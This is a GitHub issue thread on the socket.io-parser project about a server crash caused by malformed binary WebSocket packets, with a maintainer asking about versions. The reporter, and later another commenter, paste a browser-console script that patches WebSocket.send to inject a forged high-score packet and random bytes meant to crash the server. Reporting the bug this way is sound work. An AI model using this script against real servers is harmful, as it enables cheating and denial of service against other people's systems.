### ISSUE TITLE
Websocket hook sending binary data ends up crashing the server

### ISSUE THREAD

**Issue by JeFawk** [socketio/socket.io-parser#104]
I'm having issues with users trying to hack a highscore and them sending binary data through a webhook. It ends up crashing the server after some delay (10 sec to 1 min)

This is the code that can be used in the console. It seems to be needed to use a few times, unsure why.
```js
WebSocket.prototype._send = WebSocket.prototype.send; 

WebSocket.prototype.send = function () {

    //send original websocket message
    this._send(...arguments);
    
    //hack score
    this._send('42["202","0"]');
    
    //send random packets to crash server
    var randomPacket = new Uint8Array(Math.floor(Math.random()*100));
    
    for (var i = 0 ; i  < randomPacket.length; i++) 
        randomPacket[i] = Math.floor(Math.random() * (0xff + 1));
        
    this._send(randomPacket);
}
```

This is where the crash is occuring:
![unknown](https://user-images.githubusercontent.com/7268697/113917495-efb93a80-97e9-11eb-9173-f115b1bdb5ea.png)

**Comment by darrachequesne** [comment]
Which version of the `socket.io` and `socket.io-parser` packages are you using?

From your screenshot, it seems to come from: https://github.com/socketio/socket.io-parser/blob/3.4.1/index.js#L255

Which should be caught by: https://github.com/socketio/socket.io/blob/2.4.1/lib/client.js#L192-L199

Isn't that the case?

**Comment by JeFawk** [comment]
> Which version of the `socket.io` and `socket.io-parser` packages are you using?
> 
> From your screenshot, it seems to come from: https://github.com/socketio/socket.io-parser/blob/3.4.1/index.js#L255
> 
> Which should be caught by: https://github.com/socketio/socket.io/blob/2.4.1/lib/client.js#L192-L199
> 
> Isn't that the case?

I am using socket.io 2.3.0, which is using uhm I guess similar version parser. Was this fixed down the line? I'm sorry but i'm unable to test these days due to some technical... problems :(

**Comment by jang80alang** [comment]
WebSocket.prototype._send = WebSocket.prototype.send; 

WebSocket.prototype.send = function () {

    //send original websocket message
    this._send(...arguments);
    
    //hack score
    this._send('42["202","0"]');
    
    //send random packets to crash server
    var randomPacket = new Uint8Array(Math.floor(Math.random()*100));
    
    for (var i = 0 ; i  < randomPacket.length; i++) 
        randomPacket[i] = Math.floor(Math.random() * (0xff + 1));
        
    this._send(randomPacket);
}

**Comment by darrachequesne** [comment]
Closed due to inactivity, please reopen if needed.
